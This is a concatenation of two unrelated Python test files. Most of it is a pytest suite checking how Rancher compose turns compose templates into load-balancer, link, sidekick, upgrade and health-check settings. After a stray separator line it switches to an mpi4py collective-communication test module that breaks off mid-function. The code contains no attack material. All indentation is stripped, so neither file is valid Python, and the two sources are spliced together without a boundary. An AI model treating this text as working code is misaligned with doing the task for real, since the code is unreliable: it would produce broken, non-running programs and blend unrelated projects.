web = _get_service(project.services(), 'web')
web2 = _get_service(project.services(), 'web2')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 2
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == []
elif map.consumedServiceId == web2.id:
assert map.ports == []
else:
assert False
assert lb.type == 'loadBalancerService'
assert lb.launchConfig.ports == ['80:80']
def test_lb_default_port_http(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 7900:80/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
assert lb.launchConfig.ports == ['7900:80/tcp']
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
assert lb.launchConfig.ports == ['7900:80/tcp']
def test_lb_default_port_with_mapped_tcp(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
assert lb.launchConfig.ports == ['80:8080/tcp']
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
assert lb.launchConfig.ports == ['80:8080/tcp']
def test_lb_default_port_with_tcp(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80/tcp
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.consumedServiceId == web.id
assert map.ports == []
lb.launchConfig.ports == ['80/tcp']
def test_lb_path_space_target(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080
labels:
io.rancher.loadbalancer.target.web: "hostname/path:6000,
7000"
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 1
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == ['hostname/path:6000',
'7000']
else:
assert False
assert lb.type == 'loadBalancerService'
def test_lb_path_name(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:8080
labels:
io.rancher.loadbalancer.target.web: hostname/path:6000,hostname:7000
io.rancher.loadbalancer.target.web2: "9000"
links:
- web
- web2
- web3
web:
image: nginx
web2:
image: nginx
web3:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 4
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
web2 = _get_service(project.services(), 'web2')
web3 = _get_service(project.services(), 'web2')
maps = client.list_service_consume_map(serviceId=lb.id)
assert len(maps) == 3
for map in maps:
if map.consumedServiceId == web.id:
assert map.ports == ['hostname/path:6000',
'hostname:7000']
elif map.consumedServiceId == web2.id:
assert map.ports == ['9000']
elif map.consumedServiceId == web3.id:
assert map.ports == []
assert lb.launchConfig.ports == ['80:8080']
assert lb.type == 'loadBalancerService'
def test_lb_path_name_minimal(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 84:84
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.ports == []
assert map.consumedServiceId == web.id
assert lb.type == 'loadBalancerService'
assert lb.launchConfig.ports == ['84:84']
def test_lb_full_config(client, compose):
project_name = create_project(compose, file='assets/lb/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
_get_service(project.services(), 'web')
assert lb.type == 'loadBalancerService'
assert lb.loadBalancerConfig.haproxyConfig['global'] == 'foo bar\n'
assert lb.loadBalancerConfig.haproxyConfig.defaults == 'def 1\n'
def test_links(client, compose):
template = '''
web:
image: nginx
db:
image: mysql
links:
- web
other:
image: foo
links:
- web
- db
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web = _get_service(project.services(), 'web')
db = _get_service(project.services(), 'db')
other = _get_service(project.services(), 'other')
assert len(web.consumedservices()) == 0
db_consumed = db.consumedservices()
assert len(db_consumed) == 1
assert db_consumed[0].name == 'web'
other_consumed = other.consumedservices()
assert len(other_consumed) == 2
names = {i.name for i in other_consumed}
assert names == {'web', 'db'}
def test_volumes_from(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: db
image: nginx
db:
image: mysql
volumes_from:
- web
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.secondaryLaunchConfigs[0].dataVolumesFromLaunchConfigs == \
['web']
def test_sidekick_simple(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: log
image: nginx
log:
image: mysql
log2:
image: bar
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
services = project.services()
service = _get_service(services, 'web')
log2 = _get_service(services, 'log2')
assert len(services) == 2
assert service.name == 'web'
assert service.launchConfig.imageUuid == 'docker:nginx'
assert service.launchConfig.networkMode == 'managed'
assert len(service.secondaryLaunchConfigs) == 1
assert service.secondaryLaunchConfigs[0].name == 'log'
assert service.secondaryLaunchConfigs[0].imageUuid == 'docker:mysql'
assert service.secondaryLaunchConfigs[0].networkMode == 'managed'
assert log2.name == 'log2'
assert log2.launchConfig.imageUuid == 'docker:bar'
def test_sidekick_container_network(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: log
image: nginx
log:
net: container:web
image: mysql
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.launchConfig.imageUuid == 'docker:nginx'
assert len(service.secondaryLaunchConfigs) == 1
assert service.secondaryLaunchConfigs[0].name == 'log'
assert service.secondaryLaunchConfigs[0].imageUuid == 'docker:mysql'
assert service.secondaryLaunchConfigs[0].networkMode == 'container'
assert service.secondaryLaunchConfigs[0].networkLaunchConfig == 'web'
def test_not_external_service_hostname(client, compose):
template = '''
web:
hostname: foo
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'service'
assert service.launchConfig.hostname == 'foo'
def test_external_service_hostname(client, compose):
project_name = create_project(compose, file='assets/hostname/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'externalService'
assert service.hostname == 'example.com'
def test_external_ip(client, compose):
project_name = create_project(compose, file='assets/externalip/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'externalService'
assert service.externalIpAddresses == ['1.1.1.1', '2.2.2.2']
assert service.healthCheck.healthyThreshold == 2
def test_service_inplace_rollback(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'active'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-r',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
assert s2.launchConfig.imageUuid == 'docker:nginx'
def test_service_inplace_upgrade_inactive(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'inactive'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-c',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
def test_service_inplace_upgrade(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'active'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-c',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
def test_service_hash_with_rancher(client, compose):
project_name = create_project(compose,
file='assets/hash-no-rancher/test.yml')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
project_name = create_project(compose,
file='assets/hash-with-rancher/test.yml')
project = find_one(client.list_environment, name=project_name)
s2 = find_one(project.services)
assert s.metadata['io.rancher.service.hash'] is not None
assert s2.metadata['io.rancher.service.hash'] is not None
assert s.metadata['io.rancher.service.hash'] != \
s2.metadata['io.rancher.service.hash']
def test_service_hash_no_change(client, compose):
template = '''
web1:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web = find_one(project.services)
assert web.metadata['io.rancher.service.hash'] is not None
assert web.launchConfig.labels['io.rancher.service.hash'] is not None
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web2 = find_one(project.services)
assert web.metadata['io.rancher.service.hash'] == \
web2.metadata['io.rancher.service.hash']
assert web.launchConfig.labels['io.rancher.service.hash'] == \
web2.launchConfig.labels['io.rancher.service.hash']
def test_dns_service(client, compose):
template = '''
web1:
image: nginx
web2:
image: nginx
web:
image: rancher/dns-service
links:
- web1
- web2
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
services = project.services()
assert len(services) == 3
web = _get_service(services, 'web')
assert web.type == 'dnsService'
consumed = web.consumedservices()
assert len(consumed) == 2
names = {x.name for x in consumed}
assert names == {'web1', 'web2'}
def test_up_relink(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80
links:
- web
labels:
a: b
c: d
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
lb = _get_service(project.services(), 'lb')
consumed = lb.consumedservices()
assert len(consumed) == 1
assert consumed[0].name == 'web'
del lb.launchConfig.labels['io.rancher.service.hash']
assert lb.launchConfig.labels == {
'a': 'b',
'c': 'd',
}
template2 = '''
lb:
image: nginx
ports:
- 80
links:
- web2
web2:
image: nginx
'''
compose.check_call(template2, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
def check():
x = lb.consumedservices()
if len(x) == 1:
return x
consumed = wait_for(check, timeout=5)
assert len(consumed) == 1
assert consumed[0].name == 'web2'
def test_service_upgrade_from_nil(client, compose):
template = '''
foo:
image: nginx
web2:
image: nginx
'''
project_name = create_project(compose, input=template)
upgrade = '''
foo:
image: nginx
web:
image: nginx
web2:
image: nginx
'''
compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2')
def test_service_upgrade_no_global_on_src(client, compose):
template = '''
web:
image: nginx
labels:
io.rancher.scheduler.global: "true"
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
upgrade = '''
web2:
image: nginx
'''
out, err = compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
assert out.find('Upgrade is not supported for global services')
assert len(project.services()) == 1
def test_service_upgrade_no_global_on_dest(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
upgrade = '''
web2:
image: nginx
labels:
io.rancher.scheduler.global: true
'''
out, err = compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
assert out.find('Upgrade is not supported for global services')
def test_service_map_syntax(client, compose):
template = '''
foo:
image: nginx
links:
- web:alias
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
maps = client.list_serviceConsumeMap(serviceId=foo.id)
assert len(maps) == 1
assert maps[0].name == 'alias'
def test_cross_stack_link(client, compose):
template = '''
dest:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
dest = _get_service(project.services(), 'dest')
template = '''
src:
external_links:
- {}/dest
image: nginx
'''.format(project_name)
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
src = _get_service(project.services(), 'src')
services = src.consumedservices()
assert len(services) == 1
assert services[0].id == dest.id
def test_up_deletes_links(client, compose):
template = '''
dest:
image: busybox
command: cat
stdin_open: true
tty: true
src:
image: busybox
command: cat
stdin_open: true
tty: true
links:
- dest
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
src = _get_service(project.services(), 'src')
services = src.consumedservices()
assert len(services) == 1
template = '''
src:
image: nginx
'''
compose.check_call(template, '-f', '-', '-p', project_name, 'up', '-d')
services = src.consumedservices()
assert len(services) == 0
def test_upgrade_no_source(client, compose):
project_name = random_str()
compose.check_retcode(None, 1, '-p', project_name, '-f',
'assets/upgrade-ignore-scale/docker-compose.yml',
'upgrade', '--interval', '1000',
'--scale=2', 'from', 'to')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
def test_upgrade_ignore_scale(client, compose):
project_name = create_project(compose, file='assets/upgrade-ignore-scale/'
'docker-compose-source.yml')
compose.check_call(None, '--verbose', '-f', 'assets/upgrade-ignore-scale/'
'docker-compose-source.yml',
'-p', project_name, 'up', '-d')
project = find_one(client.list_environment, name=project_name)
compose.check_call(None, '-p', project_name, '-f',
'assets/upgrade-ignore-scale/docker-compose.yml',
'upgrade', '--pull', '--interval', '1000',
'--scale=2', 'from', 'to')
f = _get_service(project.services(), 'from')
to = _get_service(project.services(), 'to')
assert to.scale <= 2
f = client.wait_success(f)
to = client.wait_success(to)
assert f.scale == 0
assert to.scale == 2
assert to.state == 'active'
def test_service_link_with_space(client, compose):
template = '''
foo:
image: nginx
links:
- "web: alias"
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
maps = client.list_serviceConsumeMap(serviceId=foo.id)
assert len(maps) == 1
assert maps[0].name == 'alias'
def test_circle_simple(client, compose):
template = '''
foo:
image: nginx
links:
- web
web:
image: nginx
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
web = _get_service(project.services(), 'web')
s = find_one(foo.consumedservices)
assert s.name == 'web'
s = find_one(web.consumedservices)
assert s.name == 'foo'
def test_one_circle(client, compose):
template = '''
foo:
image: nginx
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
s = find_one(foo.consumedservices)
assert s.name == 'foo'
def test_circle_madness(client, compose):
template = '''
foo:
image: nginx
links:
- foo
- foo2
- foo3
foo2:
image: nginx
links:
- foo
- foo2
- foo3
foo3:
image: nginx
links:
- foo
- foo2
- foo3
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'up', '-d')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
foo2 = _get_service(project.services(), 'foo2')
foo3 = _get_service(project.services(), 'foo3')
assert len(foo.consumedservices()) == 3
assert len(foo2.consumedservices()) == 3
assert len(foo3.consumedservices()) == 3
def test_variables(client, compose):
project_name = random_str()
compose.check_call(None, '--env-file', 'assets/env-file/env-file',
'--verbose', '-f', 'assets/env-file/docker-compose.yml',
'-p', project_name, 'create')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.imageUuid == 'docker:B'
assert service.launchConfig.labels['var'] == 'B'
assert service.metadata.var == 'E'
assert service.metadata.var2 == ''
def test_metadata_on_service(client, compose):
project_name = create_project(compose, file='assets/metadata/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.metadata.test1[0] == 'one'
assert service.metadata.test1[1] == 'two'
assert service.metadata.test2.name == "t2name"
assert service.metadata.test2.value == "t2value"
assert service.metadata.test3
assert service.metadata.test4[0].test5.name == "t5name"
assert service.metadata.test4[1].test6.name == "t6name"
assert service.metadata.test4[1].test6.value == "t6value"
assert service.metadata.test7.test7nest.test7nestofnest[0].test7dot1.name \
== "test7dot1name"
assert service.metadata.test7.test7nest.test7nestofnest[1].test7dot2.name \
== "test7dot2name"
assert service.metadata.test8[0].test8a[0].name == "test8a"
assert service.metadata.test8[0].test8a[0].value == "test8avalue"
assert service.metadata.test8[0].test8a[1].name == "test8ab"
assert service.metadata.test8[0].test8a[1].value == "test8abvalue"
assert service.metadata.test8[1].test8b[0].name == "test8ba"
assert service.metadata.test8[1].test8b[0].value == "test8bavalue"
def test_healthchecks(client, compose):
project_name = create_project(compose, file='assets/health/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.launchConfig.healthCheck.port == 80
assert service.launchConfig.healthCheck.interval == 2000
assert service.launchConfig.healthCheck.unhealthyThreshold == 3
assert service.launchConfig.healthCheck.requestLine == \
"OPTIONS /ping HTTP/1.1\r\nHost:\\ www.example.com"
def _get_service(services, name):
service = None
for i in services:
if i.name == name:
service = i
break
assert service is not None
return service
def test_restart_no(client, compose):
template = '''
web:
image: nginx
restart: "no"
'''
project_name = create_project(compose, input=template)
find_one(client.list_environment, name=project_name)
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
p = find_one(client.list_environment, name=project_name)
find_one(p.services)
def test_stack_case(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
find_one(client.list_environment, name=project_name)
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
compose.check_call(template, '--verbose', '-f', '-', '-p',
project_name.upper(), 'up', '-d')
find_one(client.list_environment, name=project_name)
@pytest.mark.skipif('True')
def test_certs(new_context, compose_bin, request):
client = new_context.client
compose = new_compose(client, compose_bin, request)
cert = client.create_certificate(name='cert1',
cert=CERT,
certChain=CERT,
key=KEY)
cert2 = client.create_certificate(name='cert2',
cert=CERT,
certChain=CERT,
key=KEY)
cert = client.wait_success(cert)
cert2 = client.wait_success(cert2)
assert cert.state == 'active'
assert cert2.state == 'active'
project_name = create_project(compose,
file='assets/ssl/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
assert lb.defaultCertificateId == cert.id
assert lb.certificateIds == [cert.id, cert2.id]
def test_cert_not_found(new_context, compose_bin, request):
compose = new_compose(new_context.client, compose_bin, request)
compose.check_retcode(None, 1, '-p', random_str(), '-f',
'assets/ssl/docker-compose.yml', 'create')
def test_project_name(client, compose):
project_name = 'FooBar23-' + random_str()
stack = client.create_environment(name=project_name)
stack = client.wait_success(stack)
assert stack.state == 'active'
template = '''
web:
image: nginx
'''
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
assert len(project.services()) == 1
def test_project_name_case_insensitive(client, compose):
project_name = 'FooBar23-' + random_str()
stack = client.create_environment(name=project_name)
stack = client.wait_success(stack)
assert stack.state == 'active'
template = '''
web:
image: nginx
'''
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
project_name = project_name.replace('FooBar', 'fOoBaR')
assert project_name.startswith('fOoBaR')
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
assert len(project.services()) == 1
def test_project_name_with_dots(client, compose):
project_name = 'something-with-dashes-v0-2-6'
bad_project_name = 'something-with-dashes-v0.2.6'
ret = client.list_environment(name=project_name)
assert len(ret) == 0
compose.check_call(None, '--verbose', '-f',
'assets/{}/docker-compose.yml'.format(bad_project_name),
'create')
ret = client.list_environment(name=project_name)
assert len(ret) == 1
def test_create_then_up_on_circle(client, compose):
template = '''
etcd-lb:
image: rancher/load-balancer-service
links:
- etcd0
- etcd1
- etcd2
etcd0:
stdin_open: true
image: busybox
command: cat
links:
- etcd1
- etcd2
etcd1:
stdin_open: true
image: busybox
command: cat
links:
- etcd0
- etcd2
etcd2:
stdin_open: true
image: busybox
command: cat
links:
- etcd0
- etcd1
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
etcd_lb = _get_service(project.services(), 'etcd-lb')
etcd0 = _get_service(project.services(), 'etcd0')
etcd1 = _get_service(project.services(), 'etcd1')
etcd2 = _get_service(project.services(), 'etcd2')
assert len(etcd_lb.consumedservices()) == 3
assert len(etcd0.consumedservices()) == 2
assert len(etcd1.consumedservices()) == 2
assert len(etcd2.consumedservices()) == 2
assert len(etcd_lb.consumedservices()) == 3
compose.check_call(template, '-f', '-', '-p', project_name, 'up', '-d')
assert len(etcd_lb.consumedservices()) == 3
assert len(etcd0.consumedservices()) == 2
assert len(etcd1.consumedservices()) == 2
assert len(etcd2.consumedservices()) == 2
def test_expose_port_ignore(client, compose):
template = '''
foo:
image: nginx
expose:
- 1234
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
assert 'ports' not in foo.launchConfig
def test_create_no_update_links(client, compose):
template = '''
foo:
image: nginx
links:
- foo2
foo2:
image: tianon/true
foo3:
image: tianon/true
'''
project_name = random_str()
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
foo = _get_service(project.services(), 'foo')
foo2 = find_one(foo.consumedservices)
assert foo2.name == 'foo2'
template2 = '''
foo:
image: tianon/true
links:
- foo3
foo2:
image: tianon/true
foo3:
image: tianon/true
'''
compose.check_call(template2, '-p', project_name, '-f', '-', 'create')
foo2 = find_one(foo.consumedservices)
assert foo2.name == 'foo2'
def test_pull_sidekick(client, compose):
template = '''
foo:
labels:
io.rancher.sidekicks: foo2
image: nginx
foo2:
image: tianon/true
'''
project_name = random_str()
out, err = compose.check_retcode(template, 0, '-p', project_name, '-f',
'-', 'pull', stdout=subprocess.PIPE)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
assert 'nginx' in out
assert 'tianon/true' in out
def test_retain_ip(client, compose):
project_name = create_project(compose, file='assets/retain-ip/'
'docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
retain = _get_service(project.services(), 'retain')
not_retain = _get_service(project.services(), 'not-retain')
assert retain.retainIp
assert not not_retain.retainIp
def test_no_update_selector_link(client, compose):
template = '''
parent:
labels:
io.rancher.service.selector.link: foo=bar
image: tianon/true
child:
labels:
foo: bar
image: tianon/true
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
parent = _get_service(project.services(), 'parent')
find_one(parent.consumedservices)
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-d',
'parent')
parent = _get_service(project.services(), 'parent')
find_one(parent.consumedservices)
def test_sidekick_build_remote(client, compose):
template = '''
parent:
labels:
io.rancher.sidekicks: child
build: http://parent
dockerfile: parent-file
child:
build: http://child
dockerfile: child-file
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
parent = _get_service(project.services(), 'parent')
assert parent.launchConfig.build.remote == 'http://parent'
assert parent.launchConfig.build.dockerfile == 'parent-file'
assert len(parent.secondaryLaunchConfigs) == 1
assert parent.secondaryLaunchConfigs[0].build.remote == 'http://child'
assert parent.secondaryLaunchConfigs[0].build.dockerfile == 'child-file'
def test_sidekick_healthcheck(client, compose):
project_name = create_project(compose, file='assets/sidekick-health/'
'docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
parent = _get_service(project.services(), 'parent')
assert parent.launchConfig.healthCheck.port == 80
assert parent.secondaryLaunchConfigs[0].healthCheck.port == 81
def test_force_upgrade_primary(client, compose):
template = '''
parent:
labels:
io.rancher.sidekicks: child
image: nginx
child:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-d')
parent = _get_service(project.services(), 'parent')
instances = parent.instances()
child_prefix = project_name + '_child'
child_id = [x.id for x in instances if x.name.startswith(child_prefix)]
assert len(instances) == 2
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'--force-upgrade', '-d', 'parent')
new_instances = parent.instances()
new_child_id = [x.id for x in instances if x.name.startswith(child_prefix)]
assert child_id == new_child_id
ids = {x.id for x in instances}.union({x.id for x in new_instances})
assert len(ids) == 3
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'-c', '-d')
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'--force-upgrade', '-d')
ids = ids.union({x.id for x in parent.instances()})
assert len(ids) == 5
def test_virtual_machine(client, compose):
template = '''
vm:
type: virtualMachine
image: nginx
vcpu: 2
memory: 1024
userdata: |
#cloud-config
foo
disks:
- name: foo
size: 1g
opts:
foo: bar
- name: foo2
size: 2g
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
vm = find_one(project.services)
assert vm.launchConfig.kind == 'virtualMachine'
assert vm.launchConfig.vcpu == 2
assert vm.launchConfig.userdata == '#cloud-config\nfoo\n'
assert vm.launchConfig.memoryMb == 1024
assert vm.launchConfig.disks[0] == {'name': 'foo', 'size': '1g',
'opts': {'foo': 'bar'}}
assert vm.launchConfig.disks[1] == {'name': 'foo2', 'size': '2g'}
def test_cyclic_link_dependency(client, compose):
# cyclic link dependencies shouldn't error or hang
create_project(compose, file='assets/cyclic-link-dependency/'
'docker-compose.yml')
def test_yaml_corner_cases(client, compose):
create_project(compose, input='''
service:
image: nginx
environment:
A: :A
B: ":B"
C: "contains: colon"
D: 'contains: colon'
''')
|
|
from mpi4py import MPI
import mpiunittest as unittest
from functools import reduce
cumsum = lambda seq: reduce(lambda x, y: x+y, seq, 0)
cumprod = lambda seq: reduce(lambda x, y: x*y, seq, 1)
_basic = [None,
True, False,
-7, 0, 7, 2**31,
-2**63+1, 2**63-1,
-2.17, 0.0, 3.14,
1+2j, 2-3j,
'mpi4py',
]
messages = _basic
messages += [ list(_basic),
tuple(_basic),
dict([('k%d' % key, val)
for key, val in enumerate(_basic)])
]
class BaseTestCCOObj(object):
COMM = MPI.COMM_NULL
def testBarrier(self):
self.COMM.barrier()
def testBcast(self):
for smess in messages:
for root in range(self.COMM.Get_size()):
rmess = self.COMM.bcast(smess, root=root)
self.assertEqual(smess, rmess)
def testGather(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
for root in range(size):
rmess = self.COMM.gather(smess, root=root)
if rank == root:
self.assertEqual(rmess, [smess] * size)
else:
self.assertEqual(rmess, None)
def testScatter(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
for root in range(size):
if rank == root:
rmess = self.COMM.scatter([smess] * size, root=root)
else:
rmess = self.COMM.scatter(None, root=root)
self.assertEqual(rmess, smess)
def testAllgather(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
rmess = self.COMM.allgather(smess)
self.assertEqual(rmess, [smess] * size)
def testAlltoall(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
rmess = self.COMM.alltoall([smess] * size)
self.assertEqual(rmess, [smess] * size)
def testReduce(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for root in range(size):
for op in (MPI.SUM, MPI.PROD,
MPI.MAX, MPI.MIN,
MPI.MAXLOC, MPI.MINLOC,
MPI.REPLACE, MPI.NO_OP):
if op == MPI.OP_NULL: continue
if op in (MPI.MAXLOC, MPI.MINLOC):
sendobj = (rank, rank)
else:
sendobj = rank
value = self.COMM.reduce(sendobj, op=op, root=root)
if rank != root:
self.assertTrue(value is None)
else:
if op == MPI.SUM:
self.assertEqual(value, cumsum(range(size)))
elif op == MPI.PROD:
self.assertEqual(value, cumprod(range(size)))
elif op == MPI.MAX:
self.assertEqual(value, size-1)
elif op == MPI.MIN:
self.assertEqual(value, 0)
elif op == MPI.MAXLOC:
self.assertEqual(value[0], size-1)
self.assertEqual(value[1], size-1)
elif op == MPI.MINLOC:
self.assertEqual(value[0], 0)
self.assertEqual(value[1], 0)
elif op == MPI.REPLACE:
self.assertEqual(value, size-1)
elif op == MPI.NO_OP:
self.assertEqual(value, 0)
def testAllreduce(self):
